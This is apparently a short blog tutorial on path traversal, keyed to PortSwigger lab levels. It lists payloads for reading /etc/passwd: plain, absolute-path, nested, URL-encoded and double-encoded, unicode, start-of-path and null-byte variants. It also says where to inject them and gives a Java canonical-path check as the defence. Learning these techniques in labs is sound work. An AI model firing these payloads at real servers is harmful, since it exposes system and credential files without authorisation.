🔐 Path Traversal: Notes, Techniques & Attack Types

Ayush SharmaAyush Sharma
2 min read

🚀 What is Path Traversal?

Path Traversal, also known as Directory Traversal, is a web vulnerability that allows attackers to access files outside of the intended directory.

🎯 Objective: Read sensitive files (e.g. /etc/passwd, win.ini) or even write files to gain code execution.


🧩 How It Works

Example scenario:

<img src="/loadImage?filename=218.png">

Backend resolves:

/var/www/images/218.png

An attacker sends:

/loadImage?filename=../../../etc/passwd

Backend resolves:

/var/www/images/../../../etc/passwd

💥 Result: Unauthorized access to system files!


🛠️ Bypass Techniques & Attack Variants

1. 🔁 Basic Traversal (Apprentice)

../../../etc/passwd

➡️ Classic directory stepping.


2. 🧬 Absolute Path Bypass

If traversal sequences are blocked:

/etc/passwd

➡️ Directly use absolute paths from filesystem root.


3. 🧩 Nested Traversal Sequences

When ../ gets stripped, try nested obfuscation:

....//....//etc/passwd

➡️ Reverts to ../../../etc/passwd after naive filtering.


4. 🧪 Encoded Traversal (URL Tricks)

If filtering occurs before decoding:

  • %2e%2e%2f../

  • %252e%252e%252f → decoded twice to ../

  • Unicode variants:

    • ..%c0%af

    • ..%ef%bc%8f

💡 Use Burp Intruder’s Fuzzing - Path Traversal wordlist!


5. 📂 Start-of-Path Validation

If app checks input starts with /var/www/images:

/var/www/images/../../../etc/passwd

➡️ Bypasses start-check and climbs out using ...


6. 🖼️ File Extension + Null Byte Bypass

If app expects .png at the end:

../../../etc/passwd%00.png

➡️ %00 null byte truncates the string (in older systems/languages like PHP < 5.3).


🧱 How to Prevent Path Traversal

✅ Best Practices

  • Avoid user-supplied file paths.

  • ✅ Use a whitelist of file names or IDs.

  • ✅ Canonicalize and validate the final path.

🧰 Example in Java

File file = new File(BASE_DIRECTORY, userInput);
if (file.getCanonicalPath().startsWith(BASE_DIRECTORY)) {
    // Safe to use the file
}

🔍 Summary: Path Traversal Labs (PortSwigger)

Lab TypeConcept
🧠 ApprenticeBasic file traversal
🔓 Practitioner 1Absolute path bypass
🎭 Practitioner 2Nested traversal to bypass sanitization
🧪 Practitioner 3Encoded traversal sequences
🛤️ Practitioner 4Start-of-path validation bypass
🧊 Practitioner 5Null byte + file extension restriction bypass

💡 Pro Tips

  • Combine multiple evasion techniques when needed.

  • Try traversal in:

    • URL paths

    • Query params

    • Multipart forms

    • JSON inputs

    • Headers (like X-File-Path)


🧙‍♂️ Mastering path traversal opens the door to the server’s soul. Just make sure you’re wearing the white hat while you do it. 🕊️

1
Subscribe to my newsletter

Read articles from Ayush Sharma directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Ayush Sharma
Ayush Sharma